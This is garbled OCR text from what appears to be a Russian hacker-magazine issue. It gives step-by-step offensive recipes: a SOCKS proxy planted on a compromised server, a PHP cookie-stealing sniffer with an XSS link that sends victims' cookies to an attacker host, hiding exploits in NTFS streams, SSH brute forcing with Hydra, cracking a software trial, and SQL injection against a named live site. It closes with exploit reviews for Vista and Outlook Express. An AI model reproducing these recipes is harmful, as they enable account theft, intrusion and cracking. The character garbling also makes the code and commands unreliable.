обязательно с учетом регистра. В случае с блокнотом все 
просто — названием будет «Безымянный — Блокнот». Но 
для того чтобы, во-первых, не набирать название вручную 
и, во-вторых, не ошибиться в более сложных ситуациях, 




Исследуем окно для того, чтобы написать 
логику работы скрипта 



в пакет Аиіоіі входит чрезвычайно полезный инструмент. 
Утилита Аиіоіі Іпіо Тооі, о которой идет речь, выдаст 
полную информацию об открытом окне. Можешь выделить 
соответствующее поле, в котором обозначено название 
окна, и скопировать значение в реестр, чтобы позже вста- 
вить в скрипте: 

Ш-пМаіРАсРіѵе ( "Безымянный — Блокнот" ) 

Убедившись, что окно приложения активно, можно передать 
емутекст (как если бы пользователь сам набирал его на кла- 
виатуре) с помощью функции БепсІ: 

ЗепсЦ "Я читаю Хакер" ) 

В принципе, половина скрипта уже готова, и ты можешь 
попробовать, что у нас получилось, сохранив скрипт и дважды 
кликнув по нему мышкой. Работает? Двигаемся дальше. Для 
того чтобы закрыть программу, обычно используется функция 
ѴѴіпСІозе, которой в качестве параметра также передается 
имя окна: 

МіпСІозе ( "Безымянный — Блокнот" ) 

В момент попытки закрытия окна блокнота возникает 
сообщение с предложением сохранить файл. Его также 
необходимо обработать, благо выполнить этого проще 
простого. Для этого изучим всплывающее окошко с помо- 
щью уже знакомой утилиты Аиіоіі ѴѴіпбоѵѵ Іпію и увидим, 
что у кнопки «Нет» есть горячая клавиша <п>. Поэтому 
ждем появления окна с названием «Блокнот» и кнопкой 
«Нет», после чего отправляем приложению комбинацию 
клавиш <АІ_Т-Ы>. Последние две строчки скрипта будут 
выглядеть следующим образом, хотя можно было по- 
ступить иначе и проэмулировать клик по нужной кнопке 
мышью: 

ДОіпШіБАсбіѵе ( "ЫоБерасІ" , "&3аѵе" ) 

Зепй( " !п" ) 

Теперь все готово! Сразу после запуска скрипта ты увидишь, 
как открывается окно ІЧоіерасі, на экране появляется текст, 
а затем блокнотзакрывается без сохранения изменений. 
Домашнее задание — сделать та к, чтобы текст сохранялся в 
файл. Хотя, впрочем, на фигнадо! Ведьаналогичным образом 
можно автоматизировать практически любое приложение! 
Любое! 31 




> іпіо 

У ппСгоп есть 
вспомогательные 
утилиты. ѴѴіпБру 
позволяет узнать 
текущие координаты 
мыши, выяснить 
класс объекта, над 
которым находится 
мышь, получить 
информацию о коор- 
динатах основного 
и дочернего окна. 

А Сопвоіе является 
средством интерак- 
тивного общения с 
ппСгоп для работы 
со скриптовым язы- 
ком и незаменимым 
помощником для 
всех, кто только на- 
чинаетего изучение. 

Для регистрации 
ппСгоп необходимо 
в командной строке 
ввести іт.ехе хПед, 
а в появившемся 
окошке — «хІІББР 
регистрация» в 
качестве имени и 
текущий день недели 
(по-русски) вместо 
пароля. Скажем спа- 
сибо разработчику 
— нашему соотечест- 
веннику. 
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ВЛАДИМИР «ООТ.ЕВР» ЛЕОНИД «СВ@ѴѴІ_ЕВ» ОТРОЙКОВ «ВОЮ» ЛЕОНИД 

САВИЦКИЙ ИСУПОВ / ВОЮ МЛІІ-.Ви / 

/ КАІГОГЫРЕ@ВК.П(І / / СВАѴ1М-ЕПНАСК® 

ВАМВЬЕВ.ВІІ / 



Базу Наск} 




ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХВЕЩЕЙ 





2а. Если на выбранной тобой машине крутится РгееВЗй, следует за грузить 
другой файл: 

$ мдеС ЬССр: //ѵтѵ^. зесигіСу1аЬ.ги/_Соо1з/Ьоипсег- 
1 . О . гсб-СгееЪзсІ-іпСеІ . Саг . дг -О /Стр/Ъоипсег . Саг . дт. 

3. После разархивации в Дтр запускаем Боскз: 

$ /Стр/Ьоипсег 

4 . В ответ зоскз-сервер вывал иттебе список всех опций. Рассмотрим 
несколько наиболее важных, обеспечивающих выполнение поставленной 
перед нами задачи (поднятие носка). Удобнее всего использовать зоскзб: 
во-первых, этот протокол держитавторизацию, а во-вторых, с ним работает 
множество утил (втом числе и известнаятебе РгееСар). Таким образом, нам 
понадобятся следующие параметры: ‘--зоскзб’ — выбор протокола зоскзб, 

рогР — указание порта, ‘--5_и5ег’ — имя пользователя, ‘--5_раз5\л/огс1’ 

— пароль пользователя и ‘--сіаетоп’, который позволитнашему носку 
работать в режиме демона. Запускаем: 



ЗАДАЧА 



]ПОДНЯТЬ СОБСТВЕННЫЙ 50СК5, ИМЕЯ В НАЛИЧИИ 

ВЗЛОМАННЫЙ *ЫІХ-СЕРВЕР. 

РЕШЕНИЕ: 



1. Задача вполне решаема, поэтому при соответствующей подготовке 
реализация задуманного займет не более 10-15 минут. Поднимать 
носок будем на базе боунсера (Воипсег Зоскз-Зегѵег), поскольку это 
наиболее удобный, стабильный и простой в настройке вариант. 
Выбираем поломанный *піх-сервер из заначки и коннектимся к 
шеллу. 

2 . Сливаем Воипсегна ломанный сервер командой: 



$ /Стр/Ьоипсег --зоскзб --рог С 12345 --з_изег асітіп 
--з_раззѵгагсІ разз --сіаетоп 

5 . Вот и все :). Зоскз-сервер запущен на порту 1 2345 с аккаунтом вида 
асітіпфазз. 

Р.5. Кстати, аналогичное можно проделать и под Виндой с ѴѴіп32-версией 
боунсера, которую следует забрать отсюда: 

ЬССр: //зесигіСуІаЬ. ги/_Соо1з/Ьоипсег-1 . О . гс6-міп32 . гір 



$ мдеС ЬССр: / /ѵгші . зесигіСуІаЬ . ги/_Соо1з/Ьоипсег- Все параметры запуска абсолютно те же, что и в *піх-варианте, только 

1 . О . гсб-Ііпих-іпСеІ . Саг . дг -О /Стр/Ъоипсег . Саг . дг вбивать их нужно в стб.ехе. 




ЗАДАЧА 



ІУВЕСТИ ЧУЖОЙ АККАУНТ 
НА \ИЕВ-САЙТЕ ЧЕРЕЗ Х55-БАГ. 

РЕШЕНИЕ: 



Х55 (не что иное, какСгозз Бііе Зсгірбпд) представляетсобойтипуязвимос- 
тей, в ходе эксплуатации которых возможно выполнение произвольного 
ЗаѵаЗсгірІ-кода. Его исполнение может осуществляться с целью хищения 
админских куков и последующего получения контроля над атакуемым ре- 
сурсом. Рассмотрим повседневный пример. Для решения задачи предста- 
вим, чтоу нас есть дырявый двиг на сайтеѵѵѵѵѵѵ.ІагдеСсот, который содержит 
в себе Х55-баг по адресу ѵѵѵѵѵѵПагдеСсот/еггог.рЬр?гпе55аде=<5сгірІ>наш_ 
код</зсгір{>. 

1 . Пишем РНР-снифер, который получит отправленные данные пользова- 
теля с уязвимого ресурса. Пример: 



<?рЪр 

іб (іззеС ($0ЦЕКУ_5ТКШЗ) ) { 

$ЪаСе= сіаСе ('сі.т.у : Н : і : в ' ) ; 

таіі ( "уоиг_етаі1@таі1 . т" , "Соокіез", " БаСе апсі Тіте : 
$ЪаСе\п ІР: $РЕМОТЕ_АББР\п АЪгезз: $НТТР_КЕРЕКЕК\п 
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Соокіе: $ШЙКУ_ЗТКІШ\п АЗЗ : $НТТР_АССЕРТ\п АдепС : 
$НТТР_ІІЗЕР_АСЕЫТ\п Но 5 к : $НТТР_Н03Т\п Зегѵег: 
$5ЕКѴЕК_Р(ЖТ\п зсгірС : $ЗСНІРТ_ЫАМЕ\п шеЫіосІ: 

$ НЕ01ІЕЗТ_МЕТНОБ \ п ЪіСе: $СОЫТЕЫТ_ЬЕШРН\п гооС : 
$ВОСШЕЫТ_КООТ" ) ; 

} 

?> 

Вместо уоиг_етаі10таі1.ги указывается реальный мыльник, на кото- 
рый будут стекаться конфиденциальные данные :]. 

2 . Заливаем написанный снифер на любой из своих веб- шелл о в (глав- 
ное, чтобы на сервере стоял РНР). В крайнем случае можно заюзать 
какой-либо бесплатный хостинг с поддержкой РНР. Аплоадить скрипт 
необходимо в веб-директорию. Например, сюда: ЬНрѴАл/ѵѵѵѵ.Ьаскег. 
сот/зпіРрЬр . 

3. Составляем «ядовитый» линк, который мы и будем пихать жертве: 



ЬССр : / /тгы. СагдеС . сош/еггог .р1ір?теззаде=<зсгірС> 
сІоситепС . 1осаСіоп= ' ЬС Ср : / /ѵтѵтм . Ъаскег . сот/ зпі^ . 
рЬр? ' +ск>ситепС . соокіе</зсгірС> 

4 . Получившаяся ссылочка выглядит некрасиво и неаппетитно. А нам 
нужно, чтобы юзер непременно проглотил наживку. Поэтому кодируем наш 
баѵаЗсгірІ-код алгоритмом Ьазе64: 

кССр : / /ѵллм . СагдеС . сош/еггог . рЪр?теззаде=РШб стІіжіШбк 
Ь2Ы1ШѴшІС55Ъ2Ы]і<іСІѵЬб 0паНР0сВоѵЬЗ(ІЗ(іу5оУШг2ХІиУ2 9С 
ЬЗШаѴ7УисО1жРусг269замі1ЬпОиУ29ѵа21ІРС92:УЗарсН0+ 

5 . Далее все зависит от твоих способностей в сфере социнженерии и 
умения впихивать линки незнакомым людям :). После того как юзер/ад- 
мин пройдет по ссылке, его куки тут же отправятся на наш снифер, а тот, 
в свою очередь, любезно скинет их тебе на мыло :). 




потока, принадлежащего этому файлу, разделяются двоеточием: «файлшоток». 

2 . Добавим наш сплоит збасіесі в поток зігеаті файла іагдеі.сііі. Для 
этого в командной строке наберем: 




ЗАДАЧА 



дТАК СПРЯТАТЬ в чужой винде сплоит, чтобы его 

НЕВОЗМОЖНО БЫЛО НАЙТИ ДАЖЕ ПРИ ВКЛЮЧЕННОЙ ОПЦИИ 
«ОТОБРАЖАТЬ СКРЫТЫЕ ФАЙЛЫ И ПАПКИ». 

РЕШЕНИЕ (ОТ КАРДЕРА-ГУРУ С ЗАКРЫТОГО ФОРУМА): 

І.Мы собираемся скрыть наши файлы на локальном (а имея доступ кзЬеІІ, и 
на удаленном) компьютере под управлением ѴѴіпсІоѵѵз, используя особенность 
представления файлов в КІТР5. Дело втом, что любой файл в файловой системе 
ЫТР5 — это совокупность потоков данных, и то, что привычно видеть обычному 
пользователю в окошке Ехріогег’а, — лишь один из потоков данных, составляю- 
щих файл, пусть даже и основной. Информацию о других потоках стандартными 
средствами Винды получить нельзя. Добавление нового потока не изменяет 
размер файла, не изменяется и контрольная сумма файла. Имя файла и имя 



Дуре зЪасІесІ » СагдеС . йіі : збгеаті 

Здесь команда Іуре выведет содержимое файла зЬасІесІ, но вывод будет 
перенаправлен (>>) в нужный нам поток. 

3. Стандартными средствами системы проверить результат не удаст- 
ся, поэтому можно воспользоваться одной из ітееѵѵаге-программ для 
обнаружения альтернативных потоков данных, таких какзігеаппз от Марка 
Руссиновича ( ѵѵѵѵѵѵ.зѵзіпіегпаіз.согп ) или Іасіз от Ргапк РІеупе ЗоКѵѵаге [ ѵѵѵѵѵѵ. 
беузо|Ые). 

4 . В результате для файла ІагдеІ.сІІІ имеем поток зіхеаті , по размеру 
равный скрываемому сплоиту зЬасІесІ, однако размер файла Іагдеі.сШ 
не изменился. Для того чтобы просмотреть информацию, находящуюся 
в потоке, наберем: 

тоге < СагдеС . <3.11 : зСгеатІ 

6. Итак, мы скрыли наш сплоит, скопировав его содержимое в поток. 

Но рано или поздно его нужно будет оттуда достать. Это можно сделать 
командой: 

тоге < СагдеС . <3.11 : зСгеатІ » зрі 

Здесь «тоге <» выводит в консоль содержимое потока зігеаті , а ко- 
манда «>>» перенаправляет вывод в файл зрі. 




АДАЧА 



ПОДОБРАТЬ ПАРОЛЬ К55Н ДЫРЯВОГО СЕРВАКА С ПО- 
МОЩЬЮ БРУТФОРСЕРА НѴРКА. 

РЕШЕНИЕ: 



Эта задача нестандартна, потому как для ее решения недостаточно 
дистрибутива Нубга, еще потребуется специальный модуль и внима 
тельное изучение мануала. В общем, действовать тебе необходимо 
следующим образом: 

1. Сливаем библиотеку ІіЬззб, которую и юзает Гидра: 



$ ѵ?деС ЪССр: //хСооіз .огд/оСЬег/ІіЬззІі-0 . 1 .Сдг -О 
/Ртр/ІіЬззЬ-0 . 1 . Сдг 

2 . Переходим в каталог Атр (для удобства): 



$ ссі /Стр 

3. Распаковываем слитую ранее библиотеку: 
$ Саг 2 хГ ІіЪззк-0 . 1 . Сдг 
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4. Переходим в извлеченный каталог: 
$ ссі ІіЬвзЬ-О . 1 

5. Приступаем ксборке: 

$ . /сопГідиге 
$ таке 



$ таке іпзСаІІ 

6. Копируем исошникв/изг/ІіЬ: 

$ ср /изг/ІосаІ/ІіЬ/ІіЬззЬ. зо /изг/ІіЬ/ 

7. Инсталлируем и запускаем Гидру. Теперь брут по 55Н будет работать :). 





э азблокировка окна СиІеРТР 8 при помощи ІпцЗоЙ: 
ѴѴіпсІоѵѵБсаппег 



ЗАДАЧА 



3 ПОРАБОТАТЬ С РТР-КЛ ИЕНТОМ СІІТЕРТР 8 Р У КОТОРО- 
ГО ИСТЕК ДЕМОНСТРАЦИОННЫЙ СРОК. 

РЕШЕНИЕ: 



Как известно, при попытке запуска после истечения триала СиІеРТР выда- 
етокошко-наг, в котором присутствуют две кнопки: ЕпІегБегіаІ ЫитЬеги 
Сіозе. Попробуем обойти это досадное ограничение. 

1. Основная программа инициализировалась в памяти, ведь нагвыве- 
ден на фоне окна РТР-кл иента. Для того чтобы поработать с программой, 
придется каким-то образом получить доступ кзаблокированному окну. 
Прибегнем к помощи ІпцЗоЛ ѴѴіпсІоѵѵБсаппег. Запускаем его. Используя 
инструмент«Прицел», выделяем основное окно программы СігіеРТР. 

2. Нажимаем на кнопку «Управление» для вывода на экран панели 
управления активным окном. Онатутже появится в нижней части окна про- 
граммы. Из всех кнопокэтой панели нас интересует одна — кнопка «Окно 
активно» (по счету она седьмая слева). Жмем ее и... готово! Окно СиГеРГр 
теперь доступно, с программой можно работать. 

3. Навязчивый нагна время работы можноубрать путем выделения его 
окошка инструментом «Прицел» и нажатия на кнопку «Окно видимо» на 
панели управления окнами. 

АЛЬТЕРНАТИВА: 

Существует пакет Зідп о{ Мізегу ( зОт.пагосІ.ги ) оттой же конторы, который 
обладает возможностью написания несложных скриптов. С его помощью 
можно выполнять еще более изощренные вещи, обладая лишь базовым 
набором знаний и не владея отладчиком и другими крякерскимитулзами! 



№6 




РЕШЕНИЕ: 

Давай разберемся в ситуации на конкретном примере. Какты знаешь, 
в мускуле в большинстве случаев названия таблиц в базе приходится 
либо подбирать ручками, либо брутить специально предназначенным 
для этого софтом. Исключение составляет лишь Му50І_ пятой версии 
(и ниже), в котором также, как и в М55СП_, есть очень полезная для нас 
стобой база под названием іпіюгтаІіоп_5сІ"іета. В ней содержится 
информация о названии всех таблиц и полей, хранящихся в СУБД. При- 
чем обратиться с запросом к БД іпі : огта1:іоп_5сЬета может любой юзер 
СУБД независимо от прав доступа. Так что будем действовать согласно 
следующему плану: 

1 . Посмотрим, как все вышеизложенное работает на практике. Берем 
заведомоуязвимый ресурс: 



ЬЦСр : / /ѵтя . опІіпесазіпогерогЦз . сот/пемз_зЪсж_са1: . 
азр?саі;=1%27 

2. Подбираем количество полей: 

ЬЦЦр : / /ѵмм. опІіпесазіпогерогЦз . сот/пеѵѵз_з!іоілг_са1: . 
азр?сак=1%27+ипіоп+зе1есЦ+1 ,2,3-- 

Составляем кверю вида: 

ЬЦСр : / /тт. опІіпесазіпогерогЦз . сот/пемз_ 
зЬ.оѵ7_са1: . азр?саЬ=1%27+ипіоп+зе1ес1:+1 , ЦаЫе_ 
пате , 3 + Ггот+іпТогтаЦіоп_зс1іета . СаЫез-- 

3. В качестве ответа получаем список всех доступныхтабличек: 



АБМШ_ЬОСШ_АТТЕМРТЗ 

агсЬіѵе 

Ьпг_Ьаппег_Сурез 

Ьпг_Ьаппегз 

ВШ_ѴІ ЕЖ)_ВАШЕК._Ь0С5 

ВШ_ѴІ ЕѴГО_ВАШЕВ_Ь0С5_ЗиММАКУ 

ВКАЪГОЗ 

САТЕСОВІЕЗ 

4. Радуемся, поскольку в этом случае нам повезло. М55СН_ вернул нам все 
и сразу :). Обычно в запросах приходится использовать конструкцию Іор, 
которая является убогим аналогом ІітіГа в мускуле. 
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ЁШЗ НЕЗАМЕТНО И БЕЗОПАСНО КАЧАТЬ ФАЙЛЫ ИЗ ПИ- 
РИНГОВЫХ СЕТЕЙ С ПОМОЩЬЮ ОС++. 

РЕШЕНИЕ: 

Для примера возьмем одну из файлообменных пиринговых (реег-іо-реег) 
сетей и рассмотрим настройки ее клиента. Оі гесі Соппесі: — это пирин- 
говая сеть, в основе работы которой лежит файлообменный протокол, 



разработанный фирмой ЫеоМобив. Прогдля работы с этими сетями 
написано много, у большинства из них открытый код. Но, несмотря на их 
большое разнообразие, все они похожи, так какявляются доработанными 
версиями одного из самых первых клиентов для сетей Оігесі: Соппесі: 

— 0С++. Таким образом, у всех клонов 0С++ будут схожие настройки. 

1. Защищаемся носками :). 

Последние версии 0С++ поддерживают работу с Зоскз 5. Запускаем 0С++, 
открываем «РіІе-> ЗеШпдз». В появившемся меню выбираем Соппесііоп 
ЗеШпдз. Переставляем переключатель на самый нижний пунктЗОСКЗб, 
после чего нам дают возможность вбить ІРсокса (Зоскз ІР), порт (Рогі), ло- 
гин (ІІзегпате) и пароль. Ни для кого не секрет, что отыскать бесплатный 
соке несложно, но тут стоит задуматься о скорости закачки. Не забываем 
также проверить, поставлена ли галочка напротив Уве 50СК55 зегѵегШ 
гезоіѵе ЬозШатез («Использовать сервер 80СК55 для обработки хостов»]. 

2. Усиливаем защиту. 

В этом же окошке ЗеШпдз выбираем Абѵапсеб. Перед нами список допол- 
нительных настроек 0С++, где включенные опции помечены галочками. 
Проверяем наличие галочки напротив «ЕпаЫе заіе апсі сотргеззеб 
Ігапзіегз» («Разрешить защищенные передачи и передачи со сжатием»]. 
Таким образом повышаем безопасность и скорость передачи файла. Если 
галочка не поставлена поумолчанию, ставим. Далееснимаем галочкус 
опции «Абб ЬпізЬеб Ыез Іо зЬаге іпзІап1:Іу»,то есть запрещаем добавлять 
скачанные файлы в шару. Тем самым мы убираем от посторонних глаз 
полученные файлы у себя на компе. Осталось сделать пару штрихов, чтобы 
устранить всякое присутствие следов закачки. Отключаем опцию «ОопЧ 
беіеіе Тііе ІівТв ѵѵЬеп ехіііпд». После выключения 0С++ все скачанные 
файл-листы (списки расшаренных файлов удаленного пользователя) будут 
автоматически стираться. Поумолчанию они сохраняются в папку РіІеЫзІз 
в рабочем каталоге йС++. Последней нашей настройкой будет отключение 
логирования закачек. Для этого перейдем в «Рііе -4 ЗеШпдз -4 І_одз» и 
снимем галочкус пункта І_од боѵѵпіоабз. 

3. Меры по защите приняты. Теперь можно безопасно скачивать нужную 
инфу. 





Переведенный на русский языкзаголовококна плеера 1 Ьуі 



ЗАДАЧА 



3 ПЕРЕВЕСТИ НА РУССКИМ ЯЗЫК ТЕКСТОВУЮ СТРОКУ В 
МОДНОЙ ПРОГРАММЕ ТНЕ РІКЕСТОКУ РІ_АѴЕК. 

РЕШЕНИЕ: 



Для примера возьмем строку «1 Ьуі » в заголовке окна миниатюрного 
плеера 1 Ьуі . 

1. Открываем файл в шестнадцатеричном редакторе ѴѴіпНех. 

2. В меню выбираем «ЗеагсЬ -4 Ріпб Техі». 

3. В поле поиска вводим: «1 Ьуі — ТЬе Оігесбогу Ріауег», в поле кодировки 
выбираем А5СІІ (довольно часто строки хранятся именно в этой кодировке). 



4. Строчка «1 Ьуі — ТЬе Оігесіогу Ріауег» встречается в программе несколь- 
ко раз (это можно проверить, продолжив поиск по <РЗ>), поэтому придется 
перевести все ее вхождения. Как это делается? Заменить строку русским 
аналогом («Суперпроигрыватель» :)] проще всего путем редактирования 
в окне АЗСІІ-дампа (справа от области шестнадцатеричного дампа), забив 
лишние байты пробелами. После замены сохраняй файл и смотри на плоды 
своего труда. 

Если ты имеешь дело со строкой в кодировке Ыпісобе.то все немного слож- 
нее. Какты заметил, каждый символ в Юникоде кодируется двумя байтами, 
причем в случае символов английского алфавита второй байтявляется 
нулевым. В такой ситуации заменяй символы, не трогая нулевые байты 
(они отображаются точками). 

АЛЬТЕРНАТИВА: 

Если ты опасаешься навороченности и сложности ѴѴіпНех, можно восполь- 
зоваться любым редактором ресурсов, например Резіогаіог ( ѵѵѵѵѵѵ.Ьоте. 
сот/РезІогаІог/боѵѵпІоаб.ЬігпІ ) или же простейшим РезНаск Ьллл/ѵѵТокзіп. 
ги/ргоа/иі/РезНаскег.ехе ). Вотпримертого, как выполнить нашу задачу, 
используя утилиту Резіогаіог. 

1. Открываем распакованный файл. 

2. Выбираем из иерархического древа узел «Оіаіод -> 200» (в других вер- 
сиях номер ресурса можетбыть и не 200, все зависит от версии программы; 
главное — отыскать в подпапке Оіаіод форму, представляющую собой 
основное окно программы с заголовком «1 Ьуі — ТЬе Оігесіогу Ріауег»). 

3. Нажимаем кнопку Ебіі Мобе (или клавишу <Е6>] для редактирования 
нашего ресурса. 

4. В поле Сарііоп вводим перевод нашей строки. Далее выбираем «Рііе 4 
Заѵе Аз», подтверждаем изменения и сохраняем файл под другим именем. 
Р.З. Незарегистрированная версия Резіогаіог делает вышеописанное 
криво, вдобавокдополняя все заголовки окон ссылками на сайтсвоего 
производителя. Такчто лучше либо разжиться регистрацией, либо пользо- 
ваться РезНаск (он бесплатен), □с 
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КРИС КАСПЕРСКИ 



0Б30РЭКСПЛ0ИТ0В 



ВИСТА/ 

5ЕКѴЕК2008: 

V I АРР-АТАКА 
НА ОТКАЗ В 
ОБСЛУЖИВАНИИ 



>> Вгіе? 



| В начале апреля 2007 
года сотрудники исследователь- 
ского центра корпорации Бутапіес 
Ог. Затез Ноадіапсі, Маи Сопоѵег, 
Тіт Меѵѵзбат и ОШе ѴѴЫіеЬоизе 
провели анализ нового сетевого 
стека ранних бет Висты и нашли ог- 
ромное количество ошибок, часть из 
которых была исправлена МісгозоН, 
а часть благополучно перекоче- 
вала в финальную версию Висты 
и... 5егѵег2008 Неіеазе Сапсіісіаіе, 
выпущенный в октябре 2007 года. В 
частности, если отправить жертве 
специальный АНР-пакет, насильно 
прописав в поле отправителя адрес 
получателя, система рухнет и будет 
лежать до тех пор, пока администра- 
тор не перезагрузит тачку или не пе- 
ренастроит АВР-таблицы вручную. 
При этом хакер должен находиться 



ВИСТА ЗАХВАТЫВАЕТ РЫНОК УДАРНЫМИ ТЕМПАМИ, А ТУТ ЕЩЕ ОБОЗНАЧИЛСЯ 
5ЕВѴЕВ 2008 РС0, ПОЗИЦИОНИРУЕМЫЙ КАК САМАЯ БЕЗОПАСНАЯ ОСЬ ИЗ ВСЕХ 
СУЩЕСТВУЮЩИХ, ЧТО ПЛОХО СОГЛАСУЕТСЯ С ДЕЙСТВИТЕЛЬНОСТЬЮ. 
КОЛИЧЕСТВО ОШИБОК, ОБНАРУЖИВАЕМЫХ КАК В САМОЙ СИСТЕМЕ, ТАК И ВО 
ВХОДЯЩИХ В ЕЕ СОСТАВ ПРИКЛАДНЫХ КОМПОНЕНТАХ, НЕУКЛОННО РАСТЕТ, 
ПРИЧЕМ ПРАКТИЧЕСКИ ВСЕ ОШИБКИ КРИТИЧЕСКИЕ, ТО ЕСТЬ ДОПУСКАЮЩИЕ 
ВОЗМОЖНОСТЬ УДАЛЕННОГО ЗАХВАТА УПРАВЛЕНИЯ. 



Ноте Ргетіит/Вазіс, Епіегргізе, 
Визіпезз, Ьеіа 0/ЬеІа І/Ьеіа 2, 
Бегѵег 2008 Епіегргізе/Оаіасепіег 
Есіібоп ВС0. 



>> Ехріоіі 



Боевая версия 
эксплойта, написанная на Питоне, 
заточенная хакером по кличке 
КгізНап Негтапзеп (при содейс- 
твии товарищей ЫеѵѵзЬат’а и 
Н оа д Іа псГа), лежит на боѵупіоасіз. 




Боевой эксплойт в редакторе РАВ с Соіоге 



внутри локальной сети или в пре- 
делах досягаемости беспроводных 
устройств, что очень полезно для 
атакна ѴѴІ-РІ-кафе и прочие заведе- 
ния. Более подробную информацию 
об этом можно получить на ѵѵѵѵѵѵ. 
зесипМосиз.сот/ЬісІ/23266 . 



>>Тагде(5 



I МІСГОЗОН ѴѴІПСІОѴѴЗ 

Ѵізіа ОесетЬегСТР, ІІШтаІе, 



зесигіЫосиз.сот/ѵиІпегаЫІібез/ 
ехрІоііз/МісгозоК Ѵізіа АВР 
РоБ ехо.ру . но, прежде чем она 
зафурычит, придется изрядно 
потрудиться. Во-первых, необхо- 
димо скачать библиотеку Беару, 
предназначенную для хакерских 
манипуляций с пакетами (она бес- 
платна и доступна по адресу ѵѵѵѵѵѵ. 
зессіеѵ.ога/ргоіесіз/зсарѵ і. 



Во-вторых, подХР она функци- 
онировать все равно не будет, 
посколькуХР (с установленной 
заплаткой безопасности М505- 
019) вообще не поддерживает 
сырые сокеты (ВАѴѴ 50СКЕТ5), 
через которые и работает Беару. 
Авотгорячолюбимая мной ѴѴ2К 
поддерживает сырые сокеты в 
полном объеме, равно какхВБР, 

Бі п их, Мае 05 X и другие «пра- 
вильные» системы, в том числе и 
Бегѵег 2003 с отключенным бран- 
дмауэром (пеі зіор аід). Причем 
во всех этих случаях мы должны 
обладать правами гооЕа/адми- 
н и страто ра. Как вариант — можно 
установить бесплатную библио- 
теку ѴѴіпРСАР ( ѵѵѵѵѵѵ.ѵѵіпрсар.ога ). 
возвращающую ХР должную фун- 
кциональность, но она имеетсвой 
интерфейс (для согласования с 
которым придется дорабатывать 
Беару), и ктомуже на пакеты, 
переданные через РРР-соедине- 
ния, все равно наложены суровые 
ограничения. Так что ХР идет 
лесом, уступая место ѴѴ2 К/Бі п и х/ 
хВБР. На диске ты найдешь 
ключевой фрагмент эксплойта 
с моими комментариями, а пока 
рекомендую почитать следую- 
щие материалы по Бсарѵ: расзес. 
ір/рзі05/рзі05-Ыопс1і-еп.рс]Т ѵѵѵѵѵѵ. 
зессІеѵ.ога/сопіУзсарѵ І5т2003.рс1і 
и ѵѵѵѵ.зессіеѵ.ога/ргоіесІз/зсарѵЛіІез/ 
зсарубос.рсБ 



>> Зоіиііоп 



| Ну на хрен эту Висту 
и Бегѵег 2008 вместе с ней! Короче, 
в переводе с албанского: заплаток 
пока нет, и когда они появятся 
— неизвестно. 



1 

02 



М5 01ІТІ.00К 
ЕХРВЕ55/ 
МАИ: УДАЛЕННОЕ 

ПЕРЕПОЛНЕНИЕ 

КУЧИ 



>> ВгіеГ 



| Хотя сабжевые продукты 
соотносятся с операционной 
системой также, как я с пантало- 
нами, они входят в состав ѴѴіпсІоѵѵз, 
итуева хуча юзеров пользует их, 
упорно не признавая ТЬе ВаЕ 
И вот 9 октября 2007 года бгед 
МасМапиз из исследовательской 
лаборатории ѴегіБідп Юеіюпзе 
БаЬз обнаружил, что практически 
все версии ОиНоок и ѴѴіпсІоѵѵз 
Маіі некорректно обрабатывают 
команду ХНРП протокола ІМИТР 
(Ыеѵѵз ЫеЕ/ѵогк Тгапзіег Ргоіосоі), 
подробно описанную в ВРС-2980: 
«Соттоп ЫЫТР Ехіепзіопз» ( ѵѵѵѵѵѵ. 
іеи.огаМсМс2980.М ). в результате 
чего происходит переполнение кучи 
с возможностью передачи управ- 
ления на збеіі-код. Протокол ЫЫТР 
используется для чтения новостей 
(а-ля Фидо), то есть практически 
никак не используется, поскольку с 
появлением ѵѵеЬ-форумов ЫЫТР- 
серверы ушли в подполье, остав- 
шисьуделом энтузиастов. Однако 
почтовые клиенты все еще продол- 
жают поддерживать их, а браузеры 
воспринимают префикс «пеѵѵз://» 
как команду вызова встроенного/ 
внешнего ЫЫТР-клиента, которым 
у ІЕ поумолчанию является ОиНоок 
Ехргезз, то есть пользователь может 
быть атакован через 1ШБ, передан- 
ный, например, с помощью элект- 
ронной почты. За подробностями 
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обращайся по следующим адресам: 
ЫірзѴ/зІхікесепІег.ЬроіпІзѵз. 
сот/а гІісІез/2007/1 0/1 0/осІоЬег- 
2007-тісго5ОІІ-Іиезбаѵ . био:// 
ІаЬз.ібеІепзе.сот/іпІеШаепсе/ 
ѵиІпегаЬіІіІіез/сІізрІаѵ. рЬр?ісі=607 . а 
та кже ѵѵѵѵѵѵ.зесигіМосиз.сот/ 
Ыб/25908 . 



|>>ТагдеІ5 



затрагивает МісгозоіЕ ѴѴіпбоѵѵз 
Маіі (входящий в состав МісгозоЙ 
ѴѴіпбоѵѵз Ѵіз^а/Ѵізіа х64 Ебібоп), а 
также МісгозоО: Оиѣіоок Ехргезз 5.5 
5Р2/6.0/6.0 5Р1 (входящий в состав 
ѴѴ2К и ХР), так что угроза очень 
серьезная! 



>> Ехріоіі 



| Команда ХЕЮР пере- 
дает клиенту заданное количество 
заголовков статей, однако по умол- 
чанию Оиііоок Ехргезз и ѴѴіпбоѵѵз 
Маіі используют альтернативную 
команду ХОѴЕР, реализованную без 
ошибок. Ситуация кажется безна- 
дежной, но стоит покурить хорошей 
травы, и решение придет само 
собой. Если ЫЫТР-сервер в ответ 
на ХОѴЕР возвратит сообщение об 
ошибке, то ЫЫТР-клиентзадейс- 
твует «резервную» команду ХЕЮР, 
которая не была протестирована 
должным образом и содержиточень 
древний, но могучий баг. Таким 
образом, для атаки нам потребует- 
ся: во-первых, подсунуть жертве 
II РІ_ вида пеѵѵзѴ/пеѵѵз.пегиті.ога. 
ги/аи.пеѵѵз.Ьаскег . а во-вторых, 
установить по адресу пеѵѵз.пегиті. 
ога.ги свой собственный мини- 
ІМІЧТР-сервер, навязывающий 
клиенту команду ХЕЮР и вместе с 



фиктивными заголовками статей 
передающий збеіі-код, который 
захватываетуправление. Протокол 
обмена между клиентом и сервером 
смотри на диске. 



>> Боіиііоп 



| М іеговой уже вы- 
пустила заплатку М507-056 для всех 
систем, так что легче всего просто 
взять и обновиться. Однако если не 
использовать I Е, то можно просто 
забить на эту проблему или залезть 
в настройки ІЕ и запретить исполь- 
зование ОиНоок Ехргезз в качестве 
клиента для чтения новостей по 
умолчанию. 



связанный списоксо ссылками на 
изображения и может располагать- 
ся влюбом месте ТІРР-файла. ІРй 
состоит из нескольких структур, из 
которых мы рассмотрим всего лишь 
одну — ВіІзРегЗатрІе, включаю- 
щую в себя 32-битный указатель на 
данные, корректность которого не 
